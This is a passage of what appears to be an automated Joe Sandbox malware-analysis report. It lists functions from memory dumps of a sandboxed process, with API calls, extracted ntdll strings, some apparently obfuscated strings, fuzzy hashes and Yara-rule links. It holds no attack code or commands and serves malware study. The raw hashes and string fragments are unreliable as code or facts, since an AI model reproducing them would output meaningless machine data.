                                              • Instruction ID: 152cea6e3ef17fbc6e86442ed0d8c810100d14484b57900cc3aa30cc7aa83db3
                                              • Opcode Fuzzy Hash: 41ff8a621ba58417915266e834d991137c538ca29049dbfe4efb40ce6f7bfc50
                                              • Instruction Fuzzy Hash: 32E04F7528420426FA246AA89C46F66335A8B48A6CF289670B95CDB3C1EB79E5118250
                                              Function 02E179B7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,02E117A0,02E26C17,02E244F7,?), ref: 02E179F3
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: dd087a9da52471b9fdc0e14b69b3b71c5f2bbbcadda3847f245345bf555c02df
                                              • Instruction ID: 593185aca3509e2045627e3bf97e57a69f919f00ade5a224415d31ab1a51adba
                                              • Opcode Fuzzy Hash: dd087a9da52471b9fdc0e14b69b3b71c5f2bbbcadda3847f245345bf555c02df
                                              • Instruction Fuzzy Hash: F7E0C2B22C0200AEFA40A6F4CC02F9A224A5B90718F15D134B90CEB2C6DD3694568A60
                                              Function 02E179C0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,02E117A0,02E26C17,02E244F7,?), ref: 02E179F3
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: fb06de192194e8db83a03dc78d76cdb9cdb5a33a1678fab15ad4ddf691c747d4
                                              • Instruction ID: 6cc47d0fef57eae54fd042f869a23a8ebbe0fa4c22074e6a6070bef821dcc7c6
                                              • Opcode Fuzzy Hash: fb06de192194e8db83a03dc78d76cdb9cdb5a33a1678fab15ad4ddf691c747d4
                                              • Instruction Fuzzy Hash: C8D05EB22C02057BF640A6A5CC07F5A328E5B54B68F15D074BA0CEB2C2ED65E1658AA5
                                              Function 035B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6922ff221f2cede313bda77109ae3d360e605de13e07720c25316d23019a2548
                                              • Instruction ID: 9b3656dfa5764295afafe564d224b7f9e84340d511fd6860d9f94bbca00cc7ac
                                              • Opcode Fuzzy Hash: 6922ff221f2cede313bda77109ae3d360e605de13e07720c25316d23019a2548
                                              • Instruction Fuzzy Hash: EDB09B719015C5D9DA11E7615A087177A5477D0715F2DC465D2030643E4739C5D1E175

                                              Non-executed Functions

                                              Function 033B0541 Relevance: .1, Instructions: 149COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945545895.00000000033B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_33b0000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e039ec9458c3265d267d199e192067e62ddd55a08faae8e585076325675fea99
                                              • Instruction ID: b920061cfb5305bf6678cdee3bdafef15fd3e512f0d6cd239ab39aa5d7d41ce1
                                              • Opcode Fuzzy Hash: e039ec9458c3265d267d199e192067e62ddd55a08faae8e585076325675fea99
                                              • Instruction Fuzzy Hash: 0941C17491CB094FD368EF6894C16FBB3F5FB85300F50062DDA8AC3A52EB74E8468684
                                              Function 033BB689 Relevance: 56.5, Strings: 45, Instructions: 248COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945545895.00000000033B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_33b0000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                              • API String ID: 0-3558027158
                                              • Opcode ID: 06db9247b338807d4eab90d362ecd8792c70f87c2cd025aeb5b218186f6950ee
                                              • Instruction ID: 5be5277c9b83f834d4bb84e37771bbe4583d96a286798e17361914489a649971
                                              • Opcode Fuzzy Hash: 06db9247b338807d4eab90d362ecd8792c70f87c2cd025aeb5b218186f6950ee
                                              • Instruction Fuzzy Hash: 34A161F04482948AC7198F58A0552AFFFB1EBC6305F1581ADE7E6BB243C37E8905CB85
                                              Function 033B2BA9 Relevance: 38.8, Strings: 31, Instructions: 65COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945545895.00000000033B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_33b0000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "/1($&3vr$'3~o$0wkr$2zg|$3vr~$505$$grs$$grs3$hz}o$krs4$kzgk$n"/1$n"/1$oqx3$osv|$osv|$q0gw$q0lv$s3~o$vpq0$v|~k$w~qx$xqz{$xz0~$z$i"$},$n$~kvp$~kvp$~oos$~xz0
                                              • API String ID: 0-3861810630
                                              • Opcode ID: 079d820df1a5aaa43db5e455b6a2a991f73f51d74bf7dafe15702c1ba3ce6aa5
                                              • Instruction ID: 1576e64a4327140dd7a0bacc387397fa75a3a7d33bebd158b223bb11939892d2
                                              • Opcode Fuzzy Hash: 079d820df1a5aaa43db5e455b6a2a991f73f51d74bf7dafe15702c1ba3ce6aa5
                                              • Instruction Fuzzy Hash: 303168B040578DCACB19DF89C141ADDBF71FF45780F908059E8056F3AACBB58655CB89
                                              Function 035B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 5d1b35f6d2f05a0090fafc5143ac2350da8ddf6d77e3935b5c9ba738bf6df6d2
                                              • Instruction ID: c5ae3654c47db5f389e1349abde96f36a2f10f87cccfcd3250b47ececfb5cbf6
                                              • Opcode Fuzzy Hash: 5d1b35f6d2f05a0090fafc5143ac2350da8ddf6d77e3935b5c9ba738bf6df6d2
                                              • Instruction Fuzzy Hash: 4A510EB5A00256BFCF14DFA8E8909BEF7B8BB48200B548969F469D7651D334DE508BF0
                                              Function 035A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                              Download Yara Rule
                                              Strings
                                              • Execute=1, xrefs: 035E4713
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035E46FC
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 035E4742
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 035E4655
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 035E4787
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 035E4725
                                              • ExecuteOptions, xrefs: 035E46A0
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              • Opcode ID: 35a8732401864cf7f88dd408645aa4141213dc9764c7ceb1e555e6149d07a9a5
                                              • Instruction ID: f62bdad2a2199aa777efbe2067ffe6e599021788fc76c810e59963b2fc9967f4
                                              • Opcode Fuzzy Hash: 35a8732401864cf7f88dd408645aa4141213dc9764c7ceb1e555e6149d07a9a5
                                              • Instruction Fuzzy Hash: 165119756007197ADF20EBE8FC95BED77B8BF48300F040099E505AB1B1E771AA419B90
                                              Function 035BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction ID: c3e41730789dbd6558e1e7d3a67f6b1bceca5b305bb4c495973bf237a2cac28a
                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction Fuzzy Hash: F981AF70E052499FDF24CE68E8917FEBBB5BF45310F2C465AE861A73A0C7B49940CB91
                                              Function 0359F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035E02E7
                                              • RTL: Re-Waiting, xrefs: 035E031E
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035E02BD
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              • Opcode ID: f0b8ff179772b15674861cdbb8bea6e143f0b466adf97fbf25cf112b4939916a
                                              • Instruction ID: 85de2c2a473f67dc588cec6e25ca9396bc76ac57b2ef3882cb5b9ab91e999592
                                              • Opcode Fuzzy Hash: f0b8ff179772b15674861cdbb8bea6e143f0b466adf97fbf25cf112b4939916a
                                              • Instruction Fuzzy Hash: 66E1B0346047419FEB28CF29E884B6AB7E4BB88314F180A5EF5A5CB2F1D774D845CB52
                                              Function 035ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 035E7B7F
                                              • RTL: Re-Waiting, xrefs: 035E7BAC
                                              • RTL: Resource at %p, xrefs: 035E7B8E
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 0-871070163
                                              • Opcode ID: c72060d9237e7cd3999d5429f61c9f39af2af7c9940a8d4890041c1adef7fde4
                                              • Instruction ID: 53421c672d4c167d66f96796400939715db0877e8a6010b83d053e9e72588d08
                                              • Opcode Fuzzy Hash: c72060d9237e7cd3999d5429f61c9f39af2af7c9940a8d4890041c1adef7fde4
                                              • Instruction Fuzzy Hash: D541E535300B029FC724CE29EC40B6AB7E5FF88710F080A1DF956DB6A0EB71E4059B91
                                              Function 035AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 035E728C
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 035E72C1
                                              • RTL: Resource at %p, xrefs: 035E72A3
                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 035E7294
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-605551621
                                              • Opcode ID: a84c2832299447793b98a10a3edbec76b745ac430f679f5f9530d9248b1fe78e
                                              • Instruction ID: 142ea5e5fd3f81e32845a32f6c26d00bc3751b72ddec46107597a5805a3d1154
                                              • Opcode Fuzzy Hash: a84c2832299447793b98a10a3edbec76b745ac430f679f5f9530d9248b1fe78e
                                              • Instruction Fuzzy Hash: 7E41E035700746AFC724DE29EC41F6AB7A6FF88710F140A19F955EB260DB21F8429BE1
                                              Function 035B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              • API String ID: 1302938615-2137968064
                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                              • Instruction ID: 6d471a9d54ec619021fb53430bc6caf1ad5e3dee483ecb1e738a70318594d4c9
                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                              • Instruction Fuzzy Hash: 6E919370E0021A9FDF24DE69E8816FEB7B5FFC8760F18455AE865EB2E0D73099408754
                                              Function 03579126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$@
                                              • API String ID: 0-1194432280
                                              • Opcode ID: 5103766f68fc9e1dd4bc183af9b3cd82d6a16a32fcc14be8030e966bc4b5512a
                                              • Instruction ID: 9b0f4ae011e495855319c50ec7032bd22c1abd3822257d0acc7ff8c52d1b7564
                                              • Opcode Fuzzy Hash: 5103766f68fc9e1dd4bc183af9b3cd82d6a16a32fcc14be8030e966bc4b5512a
                                              • Instruction Fuzzy Hash: EF812975D002699BDB31DB54EC44BEEB7B8BB48750F0445EAE919B7290E7309E84CFA0
                                              Function 035FCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                              Download Yara Rule
                                              APIs
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 035FCFBD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: CallFilterFunc@8
                                              • String ID: @$@4Cw@4Cw
                                              • API String ID: 4062629308-3101775584
                                              • Opcode ID: d86592ae2de8e5aa67c1e8b98f5d7b23fc9ebbcff07a6b22d587381159d6aa02
                                              • Instruction ID: dc0ad7a78e3a552a46edcada92a6289344e6dbacb527acd6494b42c0f202030a
                                              • Opcode Fuzzy Hash: d86592ae2de8e5aa67c1e8b98f5d7b23fc9ebbcff07a6b22d587381159d6aa02
                                              • Instruction Fuzzy Hash: E0416E75A00219DFCB21EF95E840A6DFBF8FF85740F14442AEA14DB269E770D801CB65